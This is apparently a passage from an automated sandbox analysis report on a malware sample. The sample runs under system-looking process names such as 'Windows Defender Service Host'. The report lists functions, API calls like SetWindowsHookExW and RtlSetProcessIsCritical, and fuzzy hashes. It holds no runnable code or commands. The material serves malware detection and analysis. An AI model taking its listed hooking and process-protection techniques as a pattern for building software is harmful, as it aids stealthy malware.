                                                    • Instruction Fuzzy Hash: E351BD3190DA598FEB69EB58D845BE9B7E0EB69310F0001BBD04DD3282DB35A9858F85
                                                    Function 00007FF848F36808 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 680 7ff848f36808-7ff848f3680f 681 7ff848f3681a-7ff848f3688d 680->681 682 7ff848f36811-7ff848f36819 680->682 686 7ff848f36919-7ff848f3691d 681->686 687 7ff848f36893-7ff848f368a0 681->687 682->681 688 7ff848f368a2-7ff848f368df SetWindowsHookExW 686->688 687->688 690 7ff848f368e1 688->690 691 7ff848f368e7-7ff848f36918 688->691 690->691
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: a3972feda065f2f11ed9d6897609ec4dd43e4ece978826097a59317845aeeb9b
                                                    • Instruction ID: 778ba1c341c8e3802165f51c241dffe61bd0152aed83c69481ca19202b7614f9
                                                    • Opcode Fuzzy Hash: a3972feda065f2f11ed9d6897609ec4dd43e4ece978826097a59317845aeeb9b
                                                    • Instruction Fuzzy Hash: 7F31153090CA4C5FDB58EB6CD8466F9BBE1EF59321F10427FD049C3292CB64A852CB81
                                                    Function 00007FF848F352D9 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 694 7ff848f352d9-7ff848f353a2 FindCloseChangeNotification 698 7ff848f353aa-7ff848f353d1 694->698 699 7ff848f353a4 694->699 699->698
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 5e74bf9d03024360cc8c58ad3d422ff751f478269101ee7e4c83f6f5c984efa9
                                                    • Instruction ID: 442cf0ec12c09ab1ada3546c7e46be3e0a9fe9631085f32a3aa437c4821c5455
                                                    • Opcode Fuzzy Hash: 5e74bf9d03024360cc8c58ad3d422ff751f478269101ee7e4c83f6f5c984efa9
                                                    • Instruction Fuzzy Hash: 7741273044D6885FC706DBA4CC15BEA7FF4EF97220F0441ABD089C75A3C66D5856CB61
                                                    Function 00007FF848F34985 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 700 7ff848f34985-7ff848f34991 701 7ff848f3499c-7ff848f349ab 700->701 702 7ff848f34993-7ff848f3499b 700->702 703 7ff848f349ad-7ff848f349b5 701->703 704 7ff848f349b6-7ff848f34a5e RtlSetProcessIsCritical 701->704 702->701 703->704 708 7ff848f34a60 704->708 709 7ff848f34a66-7ff848f34a88 704->709 708->709
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 47d9e17a9452648f5d4c3a2763f7cb7db2f3f054c9ad7430b4d6e9a637b4af72
                                                    • Instruction ID: 2e339420075b8776572b9cbd269e737860240d533b0cfda0b35932bcc7612b95
                                                    • Opcode Fuzzy Hash: 47d9e17a9452648f5d4c3a2763f7cb7db2f3f054c9ad7430b4d6e9a637b4af72
                                                    • Instruction Fuzzy Hash: E8311A3180D7888FEB19EBA898466F97BF0EF66321F04016ED089D3593DB647446CB55
                                                    Function 00007FF848F3598A Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 711 7ff848f3598a-7ff848f3688d 715 7ff848f36919-7ff848f3691d 711->715 716 7ff848f36893-7ff848f368a0 711->716 717 7ff848f368a2-7ff848f368df SetWindowsHookExW 715->717 716->717 719 7ff848f368e1 717->719 720 7ff848f368e7-7ff848f36918 717->720 719->720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 9dc7462b709e9a4bd978ee2f9bbecc6b43588b704ca9ee70c5dcfa1ef1cd3161
                                                    • Instruction ID: d41f8a3d39fdbd9e552de3adbec4de2be04874527317d573c59a822aef2f8ded
                                                    • Opcode Fuzzy Hash: 9dc7462b709e9a4bd978ee2f9bbecc6b43588b704ca9ee70c5dcfa1ef1cd3161
                                                    • Instruction Fuzzy Hash: 4131C630A1CA1C9FDB58EF5CD8466B9B7E1EB59311F10413ED00ED3291DB64A8528BC5
                                                    Function 00007FF848F3451E Relevance: 1.6, APIs: 1, Instructions: 99processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: d9248e9e7c51332ada3271bcc6031ca890d470bbc6d3ceb28c05744ac90eae8a
                                                    • Instruction ID: 01bce267c02af0030b62e830ece92bc32b6eade3010d43fee34abf190b4d3647
                                                    • Opcode Fuzzy Hash: d9248e9e7c51332ada3271bcc6031ca890d470bbc6d3ceb28c05744ac90eae8a
                                                    • Instruction Fuzzy Hash: C921C17090CB489FDB18EFA8D88ABE97BF0EB65321F04416FD449D3153DA64A445CB52
                                                    Function 00007FF848F32A02 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: e999477c14674397fde1a05362202092d5082f0fa188606cee07e10a7807d75c
                                                    • Instruction ID: 86a394fd8dbc1828e22516b6ffa159b7e55540986babbc0c254dd930b602b429
                                                    • Opcode Fuzzy Hash: e999477c14674397fde1a05362202092d5082f0fa188606cee07e10a7807d75c
                                                    • Instruction Fuzzy Hash: 7A21C73091CB089FEB18EB98D84A6F977F0EB69321F00013ED04AD3652DB647846CB95
                                                    Function 00007FF848F32951 Relevance: 1.6, APIs: 1, Instructions: 96processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 337e128fe762c4dbf93b073e455b711d4922302769bfb41fb5b5a22f7e9151e8
                                                    • Instruction ID: 3e486cb0fe8e57f97ccaf3cd47d2be228639d1a24a9902eee2175d0ad5ffd208
                                                    • Opcode Fuzzy Hash: 337e128fe762c4dbf93b073e455b711d4922302769bfb41fb5b5a22f7e9151e8
                                                    • Instruction Fuzzy Hash: 5621F37090CA489FEB58EF98D88A6F97BF0EB69310F00416FD449D3152DB74A849CB55
                                                    Function 00007FF848F32985 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 9cffb81fcbe637601ec04a06acd2b124e92bb025da602ea56100cf969d8fde50
                                                    • Instruction ID: b5e6399b789925ca230d431e5b277ea6886eacbddae84bd9ff87c16dfff534d9
                                                    • Opcode Fuzzy Hash: 9cffb81fcbe637601ec04a06acd2b124e92bb025da602ea56100cf969d8fde50
                                                    • Instruction Fuzzy Hash: 1A21B17190CA4C9FDB48EB58C809BF9BBF0FBA5321F00412FD04AC3592DB64A456CB91
                                                    Function 00007FF848F3483B Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.4568600387.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ff848f30000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: FirstProcess32
                                                    • String ID:
                                                    • API String ID: 2623510744-0
                                                    • Opcode ID: 35d495eb225895aca14bc53c71d0ec57a7b06f5cb32240049049b9438a4bb78b
                                                    • Instruction ID: ef16ec39d79af272e4c8cf92e5ecb66c414037cb952624aa93d6e3901651d2f7
                                                    • Opcode Fuzzy Hash: 35d495eb225895aca14bc53c71d0ec57a7b06f5cb32240049049b9438a4bb78b
                                                    • Instruction Fuzzy Hash: 6421B331A0DA1D8FFB55EB58D845BE9B3F0FB69311F0041AAD04DD3282CB35A9818F81

                                                    Executed Functions

                                                    Function 00007FF848F10F09 Relevance: .9, Instructions: 884COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 964070efe05fa762c8ab12c54ed36a4009b67982685c18d275c85e94ba6b79e9
                                                    • Instruction ID: 5457abf0757ee7633c695b990842dc5db892cda44af33cf03237ec83af23e321
                                                    • Opcode Fuzzy Hash: 964070efe05fa762c8ab12c54ed36a4009b67982685c18d275c85e94ba6b79e9
                                                    • Instruction Fuzzy Hash: D4529D70A2DA595FE798FB3884A52B9B7E2FF88740F441579E00EC32C7DE28AC418745
                                                    Function 00007FF848F10718 Relevance: 4.0, Strings: 3, Instructions: 246COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^ $O_^"$O_^$
                                                    • API String ID: 0-3242351273
                                                    • Opcode ID: 77b393ef0b284bb52d308939e6bd96d894a6e2b4c5784a7cefeca505583f3414
                                                    • Instruction ID: 725d05c2ee501d05bfdee474dc4f08bdf87054b99eff19b2fc539c7bd4ea4d6c
                                                    • Opcode Fuzzy Hash: 77b393ef0b284bb52d308939e6bd96d894a6e2b4c5784a7cefeca505583f3414
                                                    • Instruction Fuzzy Hash: E4714A3690F55A6FD341BB6CA4E11EA3FB0EF84359B4425B6D08DCB383DE2C650687A4
                                                    Function 00007FF848F10C8E Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10d05272ae22047bbef6c2560924b4d3284781670f8a0b9609b3e97ffd970999
                                                    • Instruction ID: bed2ef06c1028523375bd7c871819acbfca27a01341988828d073727440d45d0
                                                    • Opcode Fuzzy Hash: 10d05272ae22047bbef6c2560924b4d3284781670f8a0b9609b3e97ffd970999
                                                    • Instruction Fuzzy Hash: 52712332A0D99A5FE795B73C98562B97BE2EFC9751F0400BAD849C32D3DE286C428750
                                                    Function 00007FF848F107D3 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a73d18ef9911938b66c7c7dd8356553b57d67272963906971dece462fda0de7
                                                    • Instruction ID: 112e42046c718fb970ce53470ca5daef1e656e62d9e87bcaf7ea01410f817b7c
                                                    • Opcode Fuzzy Hash: 5a73d18ef9911938b66c7c7dd8356553b57d67272963906971dece462fda0de7
                                                    • Instruction Fuzzy Hash: 5941E831A4A6596FD381FB2C90E11EA3FB1FFC8345B8060B6D009C7397CE2C29058BA4
                                                    Function 00007FF848F10B29 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction ID: c9fe91bb818f5414ea68e5cd084d94711a69181e9bfab1828ca230f9265928d7
                                                    • Opcode Fuzzy Hash: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction Fuzzy Hash: 7731F031F2995A9FE784B7B8581A3B9B6E2FF98741F04017AE40DD32C2DE2C98018752
                                                    Function 00007FF848F10850 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51ed6a71325d53d11e0466ff956d1a3a9f732a59739fc3c6e65e2fe10b13a579
                                                    • Instruction ID: 0c1eeab3ba37cb84ca10cb5ecad68f804cb4f3f3204d865326ad60f33e291b8c
                                                    • Opcode Fuzzy Hash: 51ed6a71325d53d11e0466ff956d1a3a9f732a59739fc3c6e65e2fe10b13a579
                                                    • Instruction Fuzzy Hash: 9E31C87164A6496FD386EF2890F16EA7FB1FF88305F8074A5D409C3387CE2C5A008BA1
                                                    Function 00007FF848F109E1 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 862c54c9456e18e0ea4c1ceab721a90c113e875835d46e2bef2a307c7aedf44c
                                                    • Instruction ID: c103cd457cb8876c29ccfb8203d0f35d588ede37572a22677c7e2dd669f990f0
                                                    • Opcode Fuzzy Hash: 862c54c9456e18e0ea4c1ceab721a90c113e875835d46e2bef2a307c7aedf44c
                                                    • Instruction Fuzzy Hash: 6D31AD31A19A1E9FDB84FB68C4A56EEBBF1FF88301F401579D009D3286DE3CA9018B50
                                                    Function 00007FF848F11A49 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 122445524f26db7303bf2786ccb060d561e8318efa7b612d0a6b5319370db64e
                                                    • Instruction ID: 362507904f1d248c4f3db55feb8ff252571fc41adb8691e610077fff3f4512f8
                                                    • Opcode Fuzzy Hash: 122445524f26db7303bf2786ccb060d561e8318efa7b612d0a6b5319370db64e
                                                    • Instruction Fuzzy Hash: 62216B30B1DA495FE788EB2C946A379B6D2EB9C745F0405BEE00EC32D7DE68AC418745
                                                    Function 00007FF848F11B41 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.2458059730.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19253c12a47597b3aaa2cad3ef84da36deca8716e9e0d9383c9a1c0b82913c84
                                                    • Instruction ID: 114dc8e7a5680f011ce2dd5b6384bb29d0b9b1cf6fa31af5d184503e6c4a1047
                                                    • Opcode Fuzzy Hash: 19253c12a47597b3aaa2cad3ef84da36deca8716e9e0d9383c9a1c0b82913c84
                                                    • Instruction Fuzzy Hash: A1016860A0D6C10FE342B33868664B27FE4CF953A1F0804ABE889C70D7E8189D848382

                                                    Executed Functions

                                                    Function 00007FF848F20F09 Relevance: .9, Instructions: 884COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e16b93104d7eb3b9394cc451b10efbe1ddd33b63e7c3f220f9d71531af1b34a
                                                    • Instruction ID: d123dd1a98334d15ffac6452e2a397cb48f4cd9eb9466de3758154b5381b94ac
                                                    • Opcode Fuzzy Hash: 0e16b93104d7eb3b9394cc451b10efbe1ddd33b63e7c3f220f9d71531af1b34a
                                                    • Instruction Fuzzy Hash: E452E171B2DA195FEB98FB7894662B9B7E2FF88340F440579D40EC32C2DE29A8418745
                                                    Function 00007FF848F20718 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^ $N_^"$N_^$
                                                    • API String ID: 0-4085958905
                                                    • Opcode ID: 451270aa192673610ed14670e40021bdd8cb6ecd1d2215f36ed7f7e4b295b172
                                                    • Instruction ID: c909ad37722f5736bc31949f831b182d70e0d78a42fc4087ed2348ea6a1e6fd2
                                                    • Opcode Fuzzy Hash: 451270aa192673610ed14670e40021bdd8cb6ecd1d2215f36ed7f7e4b295b172
                                                    • Instruction Fuzzy Hash: D6712576A0A16A5FD341FB7CA8A12EA3FB1EFC0354B4401B2D48CCB283DE2C65068695
                                                    Function 00007FF848F20C8E Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bc1800682d34a14d5808b1f3f0c5ec15deee3930368e568c313aad4ea182e8c
                                                    • Instruction ID: e45d8a23342245f00199565e692014f5a693bc1b23ec71ee66381c4e8a1958d5
                                                    • Opcode Fuzzy Hash: 8bc1800682d34a14d5808b1f3f0c5ec15deee3930368e568c313aad4ea182e8c
                                                    • Instruction Fuzzy Hash: 59714732E0D98A5FE795F77CA8552B97BE1EF99650F0801BAD84DC32D3DE286C028350
                                                    Function 00007FF848F207D3 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9103cee9f326e636359352473cdb8069d0b5f33504a34233831b4f8aee05fed
                                                    • Instruction ID: b903170be2fee2cae99fb8c569e491594e27d2052ca2f5ac9270399eaf92f16e
                                                    • Opcode Fuzzy Hash: b9103cee9f326e636359352473cdb8069d0b5f33504a34233831b4f8aee05fed
                                                    • Instruction Fuzzy Hash: 2A41C176A4A6695FD341EF38A0A13EA7F71EFC4340B8040A6D40CC77C7CE2D290187A1
                                                    Function 00007FF848F20B29 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ccc8a28f28c53efd961f6b07ec8337f4123f8881a1def6306d66ccabf06c98f
                                                    • Instruction ID: 6154b3a279bdcf705f5132403c5d98871560637b6456bbf54f39646b0acccb03
                                                    • Opcode Fuzzy Hash: 0ccc8a28f28c53efd961f6b07ec8337f4123f8881a1def6306d66ccabf06c98f
                                                    • Instruction Fuzzy Hash: 8231E331E29A499FE744B7B8585A3B9B7E2FF98741F14017AE40DD32C3DE2C98018752
                                                    Function 00007FF848F20850 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 601a4fe34b167e805d3b732cacf88c457491a07451b850009cd2d0952f4a4a83
                                                    • Instruction ID: 49c49de018adb7fc8d6353170bfb34a7ba26d2d88a4aebf7d5ccd91b4d5a927a
                                                    • Opcode Fuzzy Hash: 601a4fe34b167e805d3b732cacf88c457491a07451b850009cd2d0952f4a4a83
                                                    • Instruction Fuzzy Hash: 88318FB5A9A6595FD745EF2890E17AA7F71EFC8300F8045A5D80DC37C6CE3D6A008761
                                                    Function 00007FF848F209E1 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3941e0c5601dfae6669fb68f00386f9a98c77474a7811ae85f4ee9445983ee55
                                                    • Instruction ID: 6b7354054b5a4b34042a17844613d6c89f153f501a3f6fb42d5e17945dbb484e
                                                    • Opcode Fuzzy Hash: 3941e0c5601dfae6669fb68f00386f9a98c77474a7811ae85f4ee9445983ee55
                                                    • Instruction Fuzzy Hash: 3D31C031E1991A9FDB84FB68D4566ADBBF2FF98301F400579C009D32C6DE3DA8018B50
                                                    Function 00007FF848F21A49 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7cc024718bd50202759e69ae0aba8172a2622420cdfd2ee639120b031e967a7
                                                    • Instruction ID: d36011a617417c3d65ba34f89dcf1e1f29663e908ddf010441893adb5712619c
                                                    • Opcode Fuzzy Hash: d7cc024718bd50202759e69ae0aba8172a2622420cdfd2ee639120b031e967a7
                                                    • Instruction Fuzzy Hash: 2B218B30B1DA495FE788EB2C946A379B2D2EB9C745F0405BEE00EC32D7DE28AC418745
                                                    Function 00007FF848F21B41 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d87a9e5599e1da40079e21ff7bcb44692b3546770136d027f000f93d2cce47
                                                    • Instruction ID: d5ac3759a9587368b3eec6d69245330d02d53880462f3d36e1dd956c21189734
                                                    • Opcode Fuzzy Hash: 67d87a9e5599e1da40079e21ff7bcb44692b3546770136d027f000f93d2cce47
                                                    • Instruction Fuzzy Hash: 6F01472590DA814FE341B73868555757FF4CFD1391F0804BBE889C70D7ED18A9858396

                                                    Executed Functions

                                                    Function 00007FF848F10F09 Relevance: .9, Instructions: 884COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aaf2814aff4937a7d8c1bc0333b60c0d79d1cbc5933bd739bef8245d88f3dc8e
                                                    • Instruction ID: 65fee417f29268f693d7aa3d127a446a8881cd7e6c9c758afa531091187e6274
                                                    • Opcode Fuzzy Hash: aaf2814aff4937a7d8c1bc0333b60c0d79d1cbc5933bd739bef8245d88f3dc8e
                                                    • Instruction Fuzzy Hash: 2D52A030A2DA599FE798FB3894592BDB7E2FF98740F440579E00EC32C6DE28AC418745
                                                    Function 00007FF848F10718 Relevance: 4.0, Strings: 3, Instructions: 246COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
